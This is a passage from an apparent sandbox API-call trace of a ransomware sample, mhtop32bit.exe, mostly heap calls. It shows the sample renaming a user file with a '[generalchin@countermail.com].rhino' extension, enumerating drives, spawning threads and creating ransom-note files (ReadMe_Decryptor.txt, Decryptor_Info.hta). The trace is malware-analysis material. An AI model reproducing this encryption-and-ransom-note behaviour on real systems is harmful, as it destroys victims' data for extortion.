dwFlags=0x0, lpMem=0x71fe10 | out: hHeap=0x6d0000) returned 1 [0104.460] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.460] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.460] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.460] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.460] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0104.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x71fe10 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x7200a0 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71fe10 | out: hHeap=0x6d0000) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x720180 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7200a0 | out: hHeap=0x6d0000) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7202c8 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720180 | out: hHeap=0x6d0000) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x7204b0 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7202c8 | out: hHeap=0x6d0000) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x720780 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7204b0 | out: hHeap=0x6d0000) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x7200a0 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720780 | out: hHeap=0x6d0000) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7206e8 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7200a0 | out: hHeap=0x6d0000) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x721050 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7206e8 | out: hHeap=0x6d0000) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x721e68 [0104.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721050 | out: hHeap=0x6d0000) returned 1 [0104.463] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7233a8 [0104.463] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721e68 | out: hHeap=0x6d0000) returned 1 [0104.463] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7200a0 [0104.463] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7233a8 | out: hHeap=0x6d0000) returned 1 [0104.463] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x723038 [0104.463] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7200a0 | out: hHeap=0x6d0000) returned 1 [0104.463] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75ef78 [0104.463] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x723038 | out: hHeap=0x6d0000) returned 1 [0104.463] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x7200a0 [0104.463] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0104.465] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7200a0 | out: hHeap=0x6d0000) returned 1 [0104.466] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x781f78 [0104.469] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0104.469] WriteFile (in: hFile=0x104, lpBuffer=0x781f80*, nNumberOfBytesToWrite=0x158af, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x781f80*, lpNumberOfBytesWritten=0x2cfa04*=0x158af, lpOverlapped=0x0) returned 1 [0104.470] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0104.470] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x158af, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.470] CloseHandle (hObject=0x104) returned 1 [0104.603] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x71fe10 [0104.603] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7200a0 [0104.603] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71fe10 | out: hHeap=0x6d0000) returned 1 [0104.603] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ZNdVz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zndvz.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ZNdVz.gif.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zndvz.gif.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.654] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7200a0 | out: hHeap=0x6d0000) returned 1 [0104.654] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ff18 | out: hHeap=0x6d0000) returned 1 [0104.654] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0104.654] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0104.655] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.655] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0104.655] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0104.655] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.655] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a9b8 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709470 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7094f8 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709570 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709be8 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9590 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709cc0 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709d88 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c158 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c260 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c368 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c400 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c478 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c500 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c588 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c620 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c6b8 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c750 | out: hHeap=0x6d0000) returned 1 [0104.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c7d8 | out: hHeap=0x6d0000) returned 1 [0104.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c860 | out: hHeap=0x6d0000) returned 1 [0104.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c8f8 | out: hHeap=0x6d0000) returned 1 [0104.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c048 | out: hHeap=0x6d0000) returned 1 [0104.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cb78 | out: hHeap=0x6d0000) returned 1 [0104.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9648 | out: hHeap=0x6d0000) returned 1 [0104.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77c9c8 | out: hHeap=0x6d0000) returned 1 [0104.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cc70 | out: hHeap=0x6d0000) returned 1 [0104.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77caa0 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cdf8 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cea0 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cd18 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d028 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d0d0 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d270 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d358 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d440 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d528 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d610 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d6f8 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d7e0 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d8c8 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dab8 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d9b0 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dbc0 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dcb8 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dda0 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77de88 | out: hHeap=0x6d0000) returned 1 [0104.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77df70 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e058 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e150 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e248 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e340 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e428 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e510 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e5f8 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e6f0 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e7d8 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e8d8 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7808c0 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7809b8 | out: hHeap=0x6d0000) returned 1 [0104.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e9c0 | out: hHeap=0x6d0000) returned 1 [0104.816] GetModuleBaseNameA (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x7098d0, nSize=0x104 | out: lpBaseName="mhtop32bit.exe") returned 0xe [0104.816] RtlTryEnterCriticalSection (CriticalSection=0xcce05c) returned 1 [0104.816] lstrcmpA (lpString1="mhtop32bit.exe", lpString2="mhtop32bit.exe") returned 0 [0104.816] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0104.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa) returned 0x6df0f8 [0104.817] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x6df0f8 | out: lpBuffer="C:\\") returned 0x4 [0104.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709e68 [0104.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709ec8 [0104.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.817] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8610 [0104.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x14) returned 0x709e68 [0104.817] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0xc45a1e, phModule=0x709e74 | out: phModule=0x709e74*=0xc40000) returned 1 [0104.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xc8b80f, lpParameter=0x709e68, dwCreationFlags=0x0, lpThreadId=0x2cfe44 | out: lpThreadId=0x2cfe44*=0xe78) returned 0x104 [0104.907] CloseHandle (hObject=0x104) returned 1 [0104.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x14) returned 0x709f08 [0104.908] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0xc45a73, phModule=0x709f14 | out: phModule=0x709f14*=0xc40000) returned 1 [0104.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xc8b80f, lpParameter=0x709f08, dwCreationFlags=0x0, lpThreadId=0x2cfe40 | out: lpThreadId=0x2cfe40*=0xe80) returned 0x104 [0104.910] CloseHandle (hObject=0x104) returned 1 [0104.910] GetCurrentThread () returned 0xfffffffe [0104.910] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0xa) returned 0x102 [0104.913] FindResourceW (hModule=0x0, lpName=0x67, lpType=0x17) returned 0xccf0c8 [0104.913] LoadResource (hModule=0x0, hResInfo=0xccf0c8) returned 0xccf328 [0104.913] LockResource (hResData=0xccf328) returned 0xccf328 [0104.913] SizeofResource (hModule=0x0, hResInfo=0xccf0c8) returned 0xc7e [0104.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc7e) returned 0x6eb578 [0104.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x130) returned 0x708f20 [0104.913] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x708f20, nSize=0x12c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b828 [0104.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e85e8 [0104.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0104.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0104.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0104.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709f48 [0104.914] GetLastError () returned 0x50 [0104.914] SetLastError (dwErrCode=0x50) [0104.914] GetLastError () returned 0x50 [0104.915] SetLastError (dwErrCode=0x50) [0104.915] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xb8) returned 0x708cb0 [0104.915] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6a6) returned 0x6ec200 [0104.915] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ec200 | out: hHeap=0x6d0000) returned 1 [0104.915] GetLastError () returned 0x50 [0104.915] SetLastError (dwErrCode=0x50) [0104.915] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b838 [0104.915] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b848 [0104.915] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x4) returned 0x72b858 [0104.915] GetLastError () returned 0x50 [0104.915] SetLastError (dwErrCode=0x50) [0104.916] GetLastError () returned 0x50 [0104.916] SetLastError (dwErrCode=0x50) [0104.916] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xb8) returned 0x6e9338 [0104.916] GetLastError () returned 0x50 [0104.916] SetLastError (dwErrCode=0x50) [0104.916] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6a6) returned 0x6ec200 [0104.916] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ec200 | out: hHeap=0x6d0000) returned 1 [0104.916] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b838 | out: hHeap=0x6d0000) returned 1 [0104.916] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708cb0 | out: hHeap=0x6d0000) returned 1 [0104.916] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b858 | out: hHeap=0x6d0000) returned 1 [0104.916] GetLastError () returned 0x50 [0104.916] SetLastError (dwErrCode=0x50) [0104.916] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b858 [0104.917] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b838 [0104.917] GetLastError () returned 0x50 [0104.917] SetLastError (dwErrCode=0x50) [0104.917] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x200) returned 0x709be8 [0104.917] GetLastError () returned 0x50 [0104.917] SetLastError (dwErrCode=0x50) [0104.917] GetLastError () returned 0x50 [0104.917] SetLastError (dwErrCode=0x50) [0104.917] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x4) returned 0x72b868 [0104.917] GetLastError () returned 0x50 [0104.917] SetLastError (dwErrCode=0x50) [0104.917] GetLastError () returned 0x50 [0104.917] SetLastError (dwErrCode=0x50) [0104.917] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xb8) returned 0x708cb0 [0104.918] GetLastError () returned 0x50 [0104.918] SetLastError (dwErrCode=0x50) [0104.918] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6a6) returned 0x6ec200 [0104.918] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ec200 | out: hHeap=0x6d0000) returned 1 [0104.918] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b858 | out: hHeap=0x6d0000) returned 1 [0104.918] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9338 | out: hHeap=0x6d0000) returned 1 [0104.918] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b868 | out: hHeap=0x6d0000) returned 1 [0104.918] GetLastError () returned 0x50 [0104.918] SetLastError (dwErrCode=0x50) [0104.918] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b868 [0104.918] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b838 | out: hHeap=0x6d0000) returned 1 [0104.918] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b848 | out: hHeap=0x6d0000) returned 1 [0104.918] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b848 [0104.918] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b838 [0104.918] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x38) returned 0x709058 [0104.919] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0104.919] AreFileApisANSI () returned 1 [0104.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x708f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0104.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x82) returned 0x6e9338 [0104.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x708f20, cbMultiByte=-1, lpWideCharStr=0x6e9338, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta") returned 65 [0104.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decryptor_info.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2cfbb8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.921] GetFileType (hFile=0x104) returned 0x1 [0104.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9338 | out: hHeap=0x6d0000) returned 1 [0104.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b858 [0104.921] GetLastError () returned 0x0 [0104.921] SetLastError (dwErrCode=0x0) [0104.921] GetLastError () returned 0x0 [0104.921] SetLastError (dwErrCode=0x0) [0104.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xb8) returned 0x6e9338 [0104.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6a6) returned 0x6ec200 [0104.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ec200 | out: hHeap=0x6d0000) returned 1 [0104.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b868 | out: hHeap=0x6d0000) returned 1 [0104.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708cb0 | out: hHeap=0x6d0000) returned 1 [0104.922] GetLastError () returned 0x0 [0104.922] SetLastError (dwErrCode=0x0) [0104.922] RtlAllocateHeap (HeapHandle=0x6d0000, 